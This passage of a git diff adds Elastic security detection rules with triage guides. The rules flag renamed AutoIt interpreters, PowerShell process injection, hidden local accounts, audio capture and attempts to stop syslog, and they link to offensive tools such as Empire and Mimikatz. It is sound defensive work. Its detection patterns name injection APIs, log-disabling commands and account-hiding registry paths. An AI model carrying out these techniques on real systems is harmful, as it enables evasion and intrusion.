Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_110.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_110.json new file mode 100644 index 00000000000..67c688a1e30 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_110.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious AutoIt process execution. Malware written as an AutoIt script tends to rename the AutoIt executable to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Renamed AutoIt Scripts Interpreter", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_110.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_110.json new file mode 100644 index 00000000000..ea709c37ef2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_110.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of these functions." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Process Injection via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Potential Process Injection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPowerShell also has solid capabilities to make the interaction with the Win32 API in an uncomplicated and reliable way, like the execution of inline C# code, PSReflect, Get-ProcAddress, etc.\n\nRed Team tooling and malware developers take advantage of these capabilities to develop stagers and loaders that inject payloads directly into the memory without touching the disk to circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n- Check if the injected code can be retrieved (hardcoded in the script or on command line logs).\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or\n LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and\n (WriteProcessMemory or CreateRemoteThread or NtCreateThreadEx or CreateThread or QueueUserAPC or\n SuspendThread or ResumeThread or GetDelegateForFunctionPointer)\n ) and not \n (user.id:(\"S-1-5-18\" or \"S-1-5-19\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\SenseCM\")\n", + "references": [ + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-PSInject.ps1", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-ReflectivePEInjection.ps1", + "https://github.com/BC-SECURITY/Empire/blob/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.001", + "name": "Dynamic-link Library Injection", + "reference": "https://attack.mitre.org/techniques/T1055/001/" + }, + { + "id": "T1055.002", + "name": "Portable Executable Injection", + "reference": "https://attack.mitre.org/techniques/T1055/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "2e29e96a-b67c-455a-afe4-de6183431d0d_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_109.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_109.json new file mode 100644 index 00000000000..f8b4bdaefdd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_109.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden local user account by appending the dollar sign to the account name. This is sometimes done by attackers to increase access to a system and avoid appearing in the results of accounts listing using the net users command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of a Hidden Local User Account", + "note": "## Triage and analysis\n\n### Investigating Creation of a Hidden Local User Account\n\nAttackers can create accounts ending with a `$` symbol to make the account hidden to user enumeration utilities and bypass detections that identify computer accounts by this pattern to apply filters.\n\nThis rule uses registry events to identify the creation of local hidden accounts.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positive (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Delete the hidden account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\"\n)\n", + "references": [ + "http://web.archive.org/web/20230329153858/https://blog.menasec.net/2019/02/threat-hunting-6-hiding-in-plain-sights_8.html", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/tree/master/2020/2020.12.15.Lazarus_Campaign" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_110.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_110.json new file mode 100644 index 00000000000..351557bbd52 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_110.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden local user account by appending the dollar sign to the account name. This is sometimes done by attackers to increase access to a system and avoid appearing in the results of accounts listing using the net users command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of a Hidden Local User Account", + "note": "## Triage and analysis\n\n### Investigating Creation of a Hidden Local User Account\n\nAttackers can create accounts ending with a `$` symbol to make the account hidden to user enumeration utilities and bypass detections that identify computer accounts by this pattern to apply filters.\n\nThis rule uses registry events to identify the creation of local hidden accounts.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positive (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Delete the hidden account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\"\n)\n", + "references": [ + "http://web.archive.org/web/20230329153858/https://blog.menasec.net/2019/02/threat-hunting-6-hiding-in-plain-sights_8.html", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/tree/master/2020/2020.12.15.Lazarus_Campaign" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_110.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_110.json new file mode 100644 index 00000000000..37746c695e1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_110.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Script with Audio Capture Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Audio Capture Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Windows API with the intent of capturing audio from input devices connected to the victim's computer.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the recorded data locally and determine if anything was recorded.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users should not need scripts to capture audio, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Get-MicrophoneAudio\" or\n \"WindowsAudioDevice-Powershell-Cmdlet\" or\n (waveInGetNumDevs and mciSendStringA)\n )\n and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1123", + "name": "Audio Capture", + "reference": "https://attack.mitre.org/techniques/T1123/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_109.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_109.json new file mode 100644 index 00000000000..5ae98af6901 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_109.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Disable Syslog Service", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n ( (process.name == \"service\" and process.args == \"stop\") or\n (process.name == \"chkconfig\" and process.args == \"off\") or\n (process.name == \"systemctl\" and process.args in (\"disable\", \"stop\", \"kill\"))\n ) and process.args in (\"syslog\", \"rsyslog\", \"syslog-ng\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2f8a1226-5720-437d-9c20-e0029deb6194", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper 